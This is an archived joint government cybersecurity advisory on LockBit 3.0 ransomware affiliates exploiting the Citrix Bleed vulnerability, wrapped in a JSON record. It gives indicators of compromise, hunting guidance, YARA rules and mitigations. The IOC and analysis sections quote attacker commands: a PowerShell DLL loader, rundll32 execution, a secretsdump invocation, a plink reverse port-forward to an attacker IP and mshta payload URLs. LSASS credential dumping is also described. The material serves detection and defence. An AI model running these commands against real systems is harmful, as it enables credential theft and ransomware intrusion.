{
	"id": "39aa14dc-48a3-4b1e-a1a7-cf83546c9757",
	"created_at": "2026-04-06T00:18:50.670144Z",
	"updated_at": "2026-04-10T13:11:51.074594Z",
	"deleted_at": null,
	"sha1_hash": "4f215e3c3c76b89ae5dc602b1ded57d8fd0321b9",
	"title": "#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability | CISA",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 204804,
	"plain_text": "#StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE\r\n2023-4966 Citrix Bleed Vulnerability | CISA\r\nPublished: 2023-11-21 · Archived: 2026-04-06 00:04:42 UTC\r\nSUMMARY\r\nNote: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for\r\nnetwork defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware\r\nadvisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of\r\ncompromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all\r\n#StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.\r\nThe Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State\r\nInformation Sharing \u0026 Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Centre\r\n(ASD’s ACSC) are releasing this joint Cybersecurity Advisory (CSA) to disseminate IOCs, TTPs, and detection methods\r\nassociated with LockBit 3.0 ransomware exploiting CVE-2023-4966, labeled Citrix Bleed, affecting Citrix NetScaler web\r\napplication delivery control (ADC) and NetScaler Gateway appliances.\r\nThis CSA provides TTPs and IOCs obtained from FBI, ACSC, and voluntarily shared by Boeing. Boeing observed LockBit\r\n3.0 affiliates exploiting CVE-2023-4966, to obtain initial access to Boeing Distribution Inc., its parts and distribution\r\nbusiness that maintains a separate environment. 
Other trusted third parties have observed similar activity impacting their\r\norganizations.\r\nHistorically, LockBit 3.0 affiliates have conducted attacks against organizations of varying sizes across multiple critical\r\ninfrastructure sectors, including education, energy, financial services, food and agriculture, government and emergency\r\nservices, healthcare, manufacturing, and transportation. Observed TTPs for LockBit ransomware attacks can vary\r\nsignificantly.\r\nCitrix Bleed, known to be leveraged by LockBit 3.0 affiliates, allows threat actors to bypass password requirements and\r\nmultifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler\r\nweb application delivery control (ADC) and Gateway appliances. Through the takeover of legitimate user sessions,\r\nmalicious actors acquire elevated permissions to harvest credentials, move laterally, and access data and resources.\r\nCISA and the authoring organizations strongly encourage network administrators to apply the mitigations found in this CSA,\r\nwhich include isolating NetScaler ADC and Gateway appliances and applying necessary software updates through the Citrix\r\nKnowledge Center.\r\nThe authoring organizations encourage network defenders to hunt for malicious activity on their networks using the\r\ndetection methods and IOCs within this CSA. If a potential compromise is detected, organizations should apply the incident\r\nresponse recommendations. If no compromise is detected, organizations should immediately apply patches made publicly\r\navailable.\r\nFor the associated Malware Analysis Report (MAR), see: MAR-10478915-1.v1 Citrix Bleed\r\nDownload the PDF version of this report:\r\nFor a downloadable copy of IOCs, see:\r\nTECHNICAL DETAILS\r\nNote: This advisory uses the MITRE ATT\u0026CK® for Enterprise framework, version 14. 
See the MITRE ATT\u0026CK Tactics\r\nand Techniques section for a table of the threat actors’ activity mapped to MITRE ATT\u0026CK tactics and techniques. For\r\nassistance with mapping malicious cyber activity to the MITRE ATT\u0026CK framework, see CISA and MITRE ATT\u0026CK’s Best\r\nPractices for MITRE ATT\u0026CK Mapping and CISA’s Decider Tool.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa23-325a\r\nPage 1 of 14\n\nCVE-2023-4966\r\nCVE-2023-4966 is a software vulnerability found in Citrix NetScaler ADC and NetScaler Gateway appliances with\r\nexploitation activity identified as early as August 2023. This vulnerability provides threat actors, including LockBit 3.0\r\nransomware affiliates, the capability to bypass MFA [T1556.006] and hijack legitimate user sessions [T1563].\r\nAfter acquiring access to valid cookies, LockBit 3.0 affiliates establish an authenticated session within the NetScaler\r\nappliance without a username, password, or access to MFA tokens [T1539]. Affiliates acquire this by sending an HTTP\r\nGET request with a crafted HTTP Host header, leading to a vulnerable appliance returning system memory information\r\n[T1082]. The information obtained through this exploit contains a valid NetScaler AAA session cookie.\r\nCitrix publicly disclosed CVE-2023-4966 on Oct. 10, 2023, within their Citrix Security Bulletin, which issued guidance,\r\nand detailed the affected products, IOCs, and recommendations. Based on widely available public exploits and evidence of\r\nactive exploitation, CISA added this vulnerability to the Known Exploited Vulnerabilities (KEVs) Catalog. 
This critical\r\nvulnerability impacts the following software versions [1]:\r\nNetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50\r\nNetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15\r\nNetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19\r\nNetScaler ADC and NetScaler Gateway version 12.1 (EOL)\r\nNetScaler ADC 13.1FIPS before 13.1-37.163\r\nNetScaler ADC 12.1-FIPS before 12.1-55.300\r\nNetScaler ADC 12.1-NDcPP before 12.1-55.300\r\nDue to the ease of exploitation, CISA and the authoring organizations expect to see widespread exploitation of the Citrix\r\nvulnerability in unpatched software services throughout both private and public networks.\r\nThreat Actor Activity\r\nMalware identified in this campaign is generated beginning with the execution of a PowerShell script (123.ps1) which\r\nconcatenates two base64 strings together, converts them to bytes, and writes them to the designated file path.\r\n$y = \"TVqQAAMA...\u003clong base64 string\u003e\"\r\n$x = \"RyEHABFQ...\u003clong base64 string\u003e\"\r\n$filePath = \"C:\\Users\\Public\\adobelib.dll\"\r\n$fileBytes = [System.Convert]::FromBase64String($y + $x)\r\n[System.IO.File]::WriteAllBytes($filePath, $fileBytes)\r\nThe resulting file (adobelib.dll) is then executed by the PowerShell script using rundll32.\r\nrundll32 C:\\Users\\Public\\adobelib.dll,main \u003c104 hex char key\u003e\r\nThe Dynamic Link Library (DLL) will not execute correctly without the 104 hex character key. Following execution, the\r\nDLL attempts to send a POST request to https://adobe-us-updatefiles[.]digital/index.php which resolves to IP addresses\r\n172.67.129[.]176 and 104.21.1[.]180 as of November 16, 2023. 
Although adobelib.dll and the adobe-us-updatefiles[.]digital\r\nhave the appearance of legitimacy, the file and domain have no association with legitimate Adobe software and no identified\r\ninteraction with the software.\r\nOther observed activities include the use of a variety of TTPs commonly associated with ransomware activity. For example,\r\nLockBit 3.0 affiliates have been observed using AnyDesk and Splashtop remote management and monitoring (RMM), Batch\r\nand PowerShell scripts, the execution of HTA files using the Windows native utility mshta.exe and other common software\r\ntools typically associated with ransomware incidents.\r\nINDICATORS OF COMPROMISE (IOCS)\r\nSee Table 1–Table 5 for IOCs related to LockBit 3.0 affiliate exploitation of CVE-2023-4966.\r\n[Fidelity] Legend:\r\nHigh = Indicator is unique or highly indicates LockBit in an environment.\r\nMedium = Indicator was used by LockBit but is used outside of LockBit activity, albeit rarely.\r\nLow = Indicates tools that are commonly used but were used by LockBit.\r\nLow confidence indicators may not be related to ransomware.\r\nDisclaimer: Some IP addresses in this CSA may be associated with legitimate activity. Organizations are encouraged to\r\ninvestigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed\r\nas malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.\r\nTable 1: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\n192.229.221[.]95 IP Low\r\nMag.dll calls out to this IP address. Ties back to dns0.org.\r\nShould run this DLL in a sandbox, when possible, to confirm C2. 
IP\r\nis shared hosting.\r\n123.ps1\r\nPowerShell\r\nscript\r\nHigh Creates and executes payload via script.\r\n193.201.9[.]224 IP High FTP to Russian geolocated IP from compromised system.\r\n62.233.50[.]25 IP High\r\nRussian geolocated IP from compromised system.\r\nHxxp://62.233.50[.]25/en-us/docs.html\r\nHxxp://62.233.50[.]25/en-us/test.html\r\n51.91.79[.].17 IP Med Temp.sh IP.\r\nTeamviewer\r\nTool (Remote\r\nAdmin)\r\nLow  \r\n70.37.82[.]20 IP Low\r\nIP was seen from a known compromised account reaching out to an\r\nAltera IP address. LockBit is known to leverage Altera, a remote\r\nadmin tool, such as Anydesk, team viewer, etc.\r\n185.17.40[.]178 IP Low\r\nTeamviewer C2, ties back to a Polish service provider, Artnet Sp.\r\nZo.o. Polish IP address.\r\nTable 2: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\n185.229.191.41\r\nAnydesk\r\nUsage\r\nHigh Anydesk C2.\r\n81.19.135[.]219 IP High\r\nRussian geolocated IP hxxp://81.19.135[.]219/F8PtZ87fE8dJWqe.hta\r\nHxxp://81.19.135[.]219:443/q0X5wzEh6P7.hta\r\n45.129.137[.]233 IP Medium\r\nCallouts from known compromised device beginning during the\r\ncompromised window.\r\n185.229.191[.]41\r\nAnydesk\r\nUsage\r\nHigh Anydesk C2.\r\nPlink.exe Command\r\ninterpreter\r\nHigh Plink (PuTTY Link) is a command-line connection tool, similar to UNIX\r\nSSH. It is mostly used for automated operations, such as making CVS access\r\na repository on a remote server. Plink can be used to automate SSH actions\r\nand for remote SSH tunneling on Windows.\r\nAnyDeskMSI.exe\r\nRemote\r\nadmin\r\ntool\r\nHigh\r\nWe do see that AnyDeskMSI.exe was installed as a service with “auto start”\r\nabilities for persistence. 
Config file from the image could be leveraged to find\r\nthe ID and Connection IP, but we do not have that currently.\r\nSRUtility.exe\r\nSplashtop\r\nutility\r\n  9b6b722ba4a691a2fe21747cd5b8a2d18811a173413d4934949047e04e40b30a\r\nNetscan exe\r\nNetwork\r\nscanning\r\nsoftware\r\nHigh 498ba0afa5d3b390f852af66bd6e763945bf9b6bff2087015ed8612a18372155\r\nTable 3: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description\r\nScheduled task:\r\n\\MEGA\\MEGAcmd\r\nPersistence High  \r\nScheduled task:\r\nUpdateAdobeTask\r\nPersistence High  \r\nMag.dll Persistence High\r\nIdentified as running within UpdateAdobeTask\r\ncc21c77e1ee7e916c9c48194fad083b2d4b2023df703e544ffb2d6a0bfc\r\n123.ps1 Script High\r\nCreates rundll32 C:\\Users\\Public\\adobelib.dll,main\r\ned5d694d561c97b4d70efe934936286fe562addf7d6836f795b336d9791a\r\nAdobelib.dll Persistence Low C2 from adobelib.dll.\r\nAdobe-us-updatefiles[.]digital\r\nTool\r\nDownload\r\nHigh Used to download obfuscated toolsets.\r\n172.67.129[.]176\r\nTool\r\nDownload\r\nHigh IP of adobe-us-updatefiles[.]digital.\r\n104.21.1[.]180\r\nTool\r\nDownload\r\nHigh Adobe-us-updatefiles[.]digital.\r\ncmd.exe /q /c cd 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c cd \\ 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c query user 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698617793[.]44\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\ncmd.exe /q /c taskkill /f /im\r\nsqlwriter.exe /im winmysqladmin.exe\r\nCommand High wmiexec.exe usage\r\n/im w3sqlmgr.exe /im sqlwb.exe /im\r\nsqltob.exe /im sqlservr.exe /im\r\nsqlserver.exe /im sqlscan.exe /im\r\nsqlbrowser.exe /im sqlrep.exe /im\r\nsqlmangr.exe /im sqlexp3.exe /im\r\nsqlexp2.exe /im 
sqlex\r\ncmd.exe /q /c cd \\ 1\u003e\r\n\\\\127.0.0.1\\admin$\\__1698618133[.]54\r\n2\u003e\u00261\r\nCommand High wmiexec.exe usage\r\nThe authoring organizations recommend monitoring/reviewing traffic to the 81.19.135[.]* class C network and reviewing\r\nfor MSHTA being called with HTTP arguments [2].\r\nTable 4: LockBit 3.0 Affiliate Citrix Bleed Campaign\r\nIndicator Type Fidelity Description Notes\r\n81.19.135[.]219 IP High\r\nRussian geolocated IP used by user to request mshta\r\nwith http arguments to download random named HTA\r\nfile named q0X5wzzEh6P7.hta\r\n \r\n81.19.135[.]220 IP High Russian geolocated IP, seen outbound in logs\r\nIP registered to a\r\nSouth African\r\nCompany\r\n81.19.135[.]226 IP High Russian geolocated IP, seen outbound in logs\r\nIP registered to a\r\nSouth African\r\nCompany\r\nTable 5: Citrix Bleed Indicators of Compromise (IOCs)\r\nType Indicator Description\r\nFilename c:\\users\\\u003cusername\u003e\\downloads\\process hacker 2\\peview.exe Process hacker\r\nFilename c:\\users\\\u003cusername\u003e\\music\\process hacker 2\\processhacker.exe Process hacker\r\nFilename psexesvc.exe Psexec service executable\r\nFilename c:\\perflogs\\processhacker.exe Process hacker\r\nFilename c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\processhacker.exe\r\nProcess hacker\r\ntransferred via\r\nscreenconnect\r\nFilename c:\\perflogs\\lsass.dmp Lsass dump\r\nFilename c:\\users\\\u003cusername\u003e\\downloads\\mimikatz.exe Mimikatz\r\nFilename c:\\users\\\u003cusername\u003e\\desktop\\proc64\\proc.exe Procdump\r\nFilename c:\\users\\\u003cusername\u003e\\documents\\veeam-get-creds.ps1 Decrypt veeam creds\r\nFilename secretsdump.py\r\nImpacket installed on\r\nazure vm\r\nCmdline secretsdump.py \u003cdomain\u003e/\u003cusername\u003e@\u003cip\u003e -outputfile 1\r\nImpacket installed on\r\nazure vm\r\nFilename 
ad.ps1\r\nAdrecon found in\r\npowershell transcripts\r\nFilename c:\\perflogs\\64-bit\\netscan.exe Softperfect netscan\r\nFilename tniwinagent.exe\r\nTotal network inventory\r\nagent\r\nFilename psexec.exe\r\nPsexec used to deploy\r\nscreenconnect\r\nFilename 7z.exe Used to compress files\r\nTool Action1 RMM\r\nTool Atera RMM\r\ntool anydesk rmm\r\ntool fixme it rmm\r\ntool screenconnect rmm\r\ntool splashtop rmm\r\ntool zoho assist rmm\r\nipv4 101.97.36[.]61 zoho assist\r\nipv4 168.100.9[.]137 ssh portforwarding infra\r\nipv4 185.20.209[.]127 zoho assist\r\nipv4 185.230.212[.]83 zoho assist\r\nipv4 206.188.197[.]22\r\npowershell reverse shell\r\nseen in powershell\r\nlogging\r\nipv4 54.84.248[.]205 fixme ip\r\nIpv4 141.98.9[.]137\r\nRemote IP for\r\nCitrixBleed\r\ndomain assist.zoho.eu zoho assist\r\nfilename c:\\perflogs\\1.exe connectwise renamed\r\nfilename c:\\perflogs\\run.exe\r\nscreenconnect pushed\r\nby psexec\r\nfilename c:\\perflogs\\64-bit\\m.exe connectwise renamed\r\nfilename c:\\perflogs\\64-bit\\m0.exe connectwise renamed\r\nfilename c:\\perflogs\\za_access_my_department.exe zoho remote assist\r\nfilename c:\\users\\\u003cusername\u003e\\music\\za_access_my_department.exe zoho remote assist\r\nfilename c:\\windows\\servicehost.exe plink renamed\r\nfilename c:\\windows\\sysconf.bat\r\nruns servicehost.exe\r\n(plink) command\r\nfilename c:\\windows\\temp\\screenconnect\\23.8.5.8707\\files\\azure.msi\r\nzoho remote assist used\r\nto transfer data via\r\nscreenconnect\r\ncmdline\r\necho enter | c:\\windows\\servicehost.exe -ssh -r 8085:127.0.0.1:8085\r\n\u003cusername\u003e@168.100.9[.]137 -pw \u003cpassword\u003e\r\nplink port forwarding\r\ndomain eu1-dms.zoho[.]eu zoho assist\r\ndomain fixme[.]it fixme it\r\ndomain unattended.techinline[.]net fixme it\r\nMITRE ATT\u0026CK TACTICS AND TECHNIQUES\r\nSee Table 6 and Table 7 for all 
referenced threat actor tactics and techniques in this advisory.\r\nTable 6: ATT\u0026CK Techniques for Enterprise: Discovery\r\nTechnique Title ID Use\r\nSystem Information\r\nDiscovery\r\nT1082 Threat actors will attempt to obtain information about the operating system and\r\nhardware, including versions and patches.\r\nTable 7: ATT\u0026CK Techniques for Enterprise: Credential Access\r\nTechnique Title ID Use\r\nModify Authentication\r\nProcess: Multifactor\r\nAuthentication\r\nT1556.006\r\nThreat actors leverage vulnerabilities found within CVE- to compromise,\r\nmodify, and/or bypass multifactor authentication to hijack user sessions,\r\nharvest credentials, and move laterally, which enables persistent access.\r\nSteal Web Session Cookie T1539\r\nThreat actors with access to valid cookies can establish an authenticated\r\nsession within the NetScaler appliance without a username, password, or\r\naccess to multifactor authentication (MFA) tokens.\r\nDETECTION METHODS\r\nHunting Guidance\r\nNetwork defenders should prioritize observing users in session when hunting for network anomalies. This will aid the hunt\r\nfor suspicious activity such as installing tools on the system (e.g., putty, rClone), new account creation, log item failure, or\r\nrunning commands such as hostname, quser, whoami, net, and taskkill. 
Rotating credentials for identities provisioned for\r\naccessing resources via a vulnerable NetScaler ADC or Gateway appliance can also aid in detection.\r\nFor IP addresses:\r\nIdentify if NetScaler logs the change in IP.\r\nIdentify if users are logging in from geolocations uncommon for your organization’s user base.\r\nIf logging VPN authentication, identify if users are associated with two or more public IP addresses while in a\r\ndifferent subnet or geographically dispersed.\r\nNote: MFA to NetScaler will not operate as intended due to the attacker bypassing authentication by providing a\r\ntoken/session for an already authenticated user.\r\nThe following procedures can help identify potential exploitation of CVE-2023-4966 and LockBit 3.0 activity:\r\nSearch for filenames that contain tf0gYx2YI for identifying LockBit encrypted files.\r\nLockBit 3.0 actors were seen using the C:\\Temp directory for loading and the execution of files.\r\nInvestigate requests to the HTTP/S endpoint from WAF.\r\nHunt for suspicious login patterns from NetScaler logs.\r\nHunt for suspicious virtual desktop agent Windows Registry keys.\r\nAnalyze memory core dump files.\r\nBelow are CISA-developed YARA rules and an open-source rule that may be used to detect malicious activity in the Citrix\r\nNetScaler ADC and Gateway software environment. For more information on detecting suspicious activity within NetScaler\r\nlogs or additional resources, visit CISA’s Malware Analysis Report (MAR) MAR-10478915-1.v1 Citrix Bleed or the\r\nresource section of this CSA [3]:\r\nYARA Rules\r\nCISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority\r\nSubsystem Service (LSASS) process memory to disk, and attempt to establish sessions via Windows Remote Management\r\n(WinRM). 
The files include:\r\nWindows Batch file (.bat)\r\nWindows Executable (.exe)\r\nWindows Dynamic Link Library (.dll)\r\nPython Script (.py)\r\nrule CISA_10478915_01 : trojan installs_other_components\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"installs-other-components\"\r\nmalware_Type = \"trojan\"\r\ntool_type = \"information-gathering\"\r\ndescription = \"Detects trojan .bat samples\"\r\nsha256 = \"98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9\"\r\nstrings:\r\n$s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }\r\n$s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61\r\n73 6b 73\r\n5c 65 6d }\r\n$s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77\r\n69 6e 64\r\n6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }\r\ncondition:\r\nall of them\r\n}\r\nThis file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an\r\nargument. The output is printed to a file named 'z.txt' located in the path C:\\Windows\\Tasks. Next, a.bat pings the loop back\r\ninternet protocol (IP) address 127.0.0[.]1 three times.\r\nThe next command it runs is reg save to save the HKLM\\SYSTEM registry hive into the C:\\Windows\\tasks\\em directory.\r\nAgain, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the\r\nHKLM\\SAM registry hive into the C:\\Windows\\Task\\am directory. Next, a.bat runs three makecab commands to create\r\nthree cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:\\Users\\Public\\a.png. 
The\r\nnames of the .cab files are as follows:\r\nc:\\windows\\tasks\\em.cab\r\nc:\\windows\\tasks\\am.cab\r\nc:\\windows\\tasks\\a.cab\r\nimport \"pe\"\r\nrule CISA_10478915_02 : trojan installs_other_components\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"installs-other-components\"\r\nmalware_type = \"trojan\"\r\ntool_type = \"unknown\"\r\ndescription = \"Detects trojan PE32 samples\"\r\nsha256 = \"e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068\"\r\nstrings:\r\n$s1 = { 57 72 69 74 65 46 69 6c 65 }\r\n$s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68\r\n6f 64 }\r\n$s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }\r\n$s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }\r\n$s5 = { 64 65 6c 65 74 65 5b 5d }\r\n$s6 = { 4e 41 4e 28 49 4e 44 29 }\r\ncondition:\r\nuint16(0) == 0x5a4d and pe.imphash() == \"6e8ca501c45a9b85fff2378cffaa24b2\" and pe.size_of_code == 84480 and\r\nall of\r\nthem\r\n}\r\nThis file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the remote\r\nprocedure call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine.\r\nOnce the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. 
If\r\nthe DLL is correctly loaded, then the malware outputs the message \"[*]success\" in the console.\r\nimport \"pe\"\r\nrule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"steals-authentication-credentials\"\r\nmalware_type = \"trojan\"\r\ntool_type = \"credential-exploitation\"\r\ndescription = \"Detects trojan DLL samples\"\r\nsha256 = \"17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994\"\r\nstrings:\r\n$s1 = { 64 65 6c 65 74 65 }\r\n$s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }\r\n$s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }\r\n$s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }\r\n$s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }\r\n$s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }\r\ncondition:\r\nuint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of\r\nthem\r\n}\r\nThis file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads\r\nthis file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to\r\ncreate a file called a.png in the path C:\\Users\\Public.\r\nNext, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If\r\nsuccessful, the dumped process memory is written to a.png. 
Once this is complete, the file a.bat specifies that the file a.png\r\nis used to create the cabinet file called a.cab in the path C:\\Windows\\Tasks.\r\nrule CISA_10478915_04 : backdoor communicates_with_c2 remote_access\r\n{\r\nmeta:\r\nauthor = \"CISA Code \u0026 Media Analysis\"\r\nincident = \"10478915\"\r\ndate = \"2023-11-06\"\r\nlast_modified = \"20231108_1500\"\r\nactor = \"n/a\"\r\nfamily = \"n/a\"\r\ncapabilities = \"communicates-with-c2\"\r\nmalware_type = \"backdoor\"\r\ntool_type = \"remote-access\"\r\ndescription = \"Detects trojan python samples\"\r\nsha256 = \"906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6\"\r\nstrings:\r\n$s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }\r\n$s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }\r\n$s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }\r\n$s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }\r\ncondition:\r\nall of them\r\n}\r\nThis file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to\r\nauthenticate to the remote machine using NT LAN Manager (NTLM) if the keyword \"hashpasswd\" is present. If the\r\nkeyword \"hashpasswd\" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM\r\nsession is established with the remote machine, the script has the ability to execute command line arguments on the remote\r\nmachine. 
If there is no command specified, then a default command of “whoami” is run.\r\nOpen Source YARA Rule\r\nimport \"pe\"\r\nrule M_Hunting_Backdoor_FREEFIRE\r\n{\r\nmeta: author = \"Mandiant\"\r\ndescription = \"This is a hunting rule to detect FREEFIRE samples using OP code sequences in getLastRecord method\"\r\nmd5 = \"eb842a9509dece779d138d2e6b0f6949\"\r\nmalware_family = \"FREEFIRE\"\r\nstrings: $s1 = { 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 74 ?? ?? ?? ?? 25\r\n72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ??\r\n7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 6F\r\n?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? ??\r\n}\r\ncondition:\r\nuint16(0) == 0x5A4D\r\nand filesize \u003e= 5KB\r\nand pe.imports(\"mscoree.dll\")\r\nand all of them }\r\nINCIDENT RESPONSE\r\nOrganizations are encouraged to assess Citrix software and their systems for evidence of compromise, and to hunt for\r\nmalicious activity (see Additional Resources section). If compromise is suspected or detected, organizations should assume\r\nthat threat actors hold full administrative access and can perform all tasks associated with the web management software as\r\nwell as installing malicious code.\r\nIf a potential compromise is detected, organizations should:\r\n1. Quarantine or take offline potentially affected hosts.\r\n2. Reimage compromised hosts.\r\n3. Create new account credentials.\r\n4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network\r\nconnections.\r\nNote: Removing malicious administrator accounts may not fully mitigate risk considering threat actors may\r\nhave established additional persistence mechanisms.\r\n5. 
Report the compromise to FBI Internet Crime Complaint Center (IC3) at IC3.gov, local FBI Field Office, or CISA\r\nvia the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov or 1-844-Say-CISA).\r\nState, local, tribal, or territorial government (SLTT) entities can also report to MS-ISAC (SOC@cisecurity.org or\r\n866-787-4722). If outside of the US, please contact your national cyber center.\r\nMITIGATIONS\r\nThese mitigations apply to all critical infrastructure organizations and network defenders using Citrix NetScaler ADC and\r\nGateway software. CISA and authoring organizations recommend that software manufacturers incorporate secure-by-design\r\nand -default principles and tactics into their software development practices to limit the impact of exploitation such as threat\r\nactors leveraging unpatched vulnerabilities within Citrix NetScaler appliances, which strengthens the security posture of\r\ntheir customers.\r\nFor more information on secure by design, see CISA’s Secure by Design and Default webpage and joint guide.\r\nThe authoring organizations of this CSA recommend organizations implement the mitigations below to improve your\r\ncybersecurity posture on the basis of the threat actor activity and to reduce the risk of compromise associated with Citrix\r\nCVE-2023-4966 and LockBit 3.0 ransomware \u0026 ransomware affiliates. These mitigations align with the Cross-Sector\r\nCybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology\r\n(NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations\r\nimplement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most\r\ncommon and impactful threats, tactics, techniques, and procedures. 
Visit CISA’s Cross-Sector Cybersecurity Performance\r\nGoals for more information on the CPGs, including additional recommended baseline protections.\r\nIsolate NetScaler ADC and Gateway appliances for testing until patching is ready and deployable.\r\nSecure remote access tools by:\r\nImplement application controls to manage and control the execution of software, including allowlisting\r\nremote access programs. Application controls should prevent the installation and execution of portable\r\nversions of unauthorized remote access and other software. A properly configured application allowlisting\r\nsolution will block any unlisted application execution. Allowlisting is important because antivirus solutions\r\nmay fail to detect the execution of malicious portable executables when the files use any combination of\r\ncompression, encryption, or obfuscation.\r\nStrictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best\r\npractices, for example [CPG 2.W]:\r\nAudit the network for systems using RDP.\r\nClose unused RDP ports.\r\nEnforce account lockouts after a specified number of attempts.\r\nApply phishing-resistant multifactor authentication (MFA).\r\nLog RDP login 